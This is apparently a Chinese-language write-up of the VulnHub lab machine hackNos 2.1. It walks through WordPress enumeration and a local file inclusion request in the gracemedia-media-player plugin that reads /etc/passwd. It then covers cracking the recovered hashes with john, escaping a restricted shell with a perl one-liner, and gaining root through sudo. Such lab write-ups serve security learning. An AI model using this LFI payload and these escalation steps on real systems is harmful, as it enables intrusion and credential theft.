0x00 基本信息

靶机描述

Difficulty : Easy to Intermediate
Flag : 2 Flag first user And second root
Learning : Web Application | Enumeration | Password Cracking

靶机下载

Download: https://drive.google.com/open?id=1Uszfqoomm7iv_c4aiuNb6UPl8Zgfv58s
Download (Mirror): https://download.vulnhub.com/hacknos/Os-hackNos-2.1.ova
Download (Torrent): https://download.vulnhub.com/hacknos/Os-hackNos-2.1.ova.torrent ( Magnet)

0x01 信息收集

kali：192.168.56.102
靶机：192.168.56.103

端口扫描：

目录扫描：

目录扫描中发现 tsweb目录访问：

因为发现是wp- 符合wordpress的特征，使用wpscan来扫描：

发现一个插件gracemedia-media-player

0x02 漏洞利用

搜索刚才的插件，发现该插件存在一个LFI，poc如下：

GET
/wordpress/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd

找到1000，发现一个用户名rohit
rohit❌1000:1000:hackNos:/home/rohit:/bin/bash
flag:$1$1flag$vqjCxzjtRc7PofLYS2lWf/:1001:1003::/home/flag:/bin/rbash
这里有2个用户，一个rohit,一个flag，flag用户密码使用MD5加密且使用的rbash

使用john**密码：

可以发现flag的密码为topsecret
使用ssh登录靶机，登录成功：

但是可以看到无法使用cd 命令：

通过使用 perl -e ‘exec “bin/sh”;’ 即可逃逸

0x03 权限提升

1、使用脚本查找提权方式
2、手动查找具有root权限的可执行文件
3、查找具有账户密码

查找文件，在/var/backups/passbkp/md5-hash发现了一个密码：

同样使用john来**：

**出一个密码：！%hack41
之前有一个rohit用户，尝试登陆成功：

然后直接在服务器登陆不能够获取到root权限，但是使用rohit：!%hack41通过ssh登陆，在sudo su 可以直接切换到root权限：

0x04 总结&问题&知识点

1、（LFI）什么是gracemedia-media-player？
2、什么是rbash逃逸？
rbash是一个命令受限的shell
逃逸参考文章：
https://blog.csdn.net/weixin_44214107/article/details/103645000
https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
https://www.4hou.com/penetration/11674.html
3、如何使用john**？

参考文章

https://blog.csdn.net/weixin_44214107/article/details/104326416
https://wangdudu.blog.csdn.net/article/details/104113497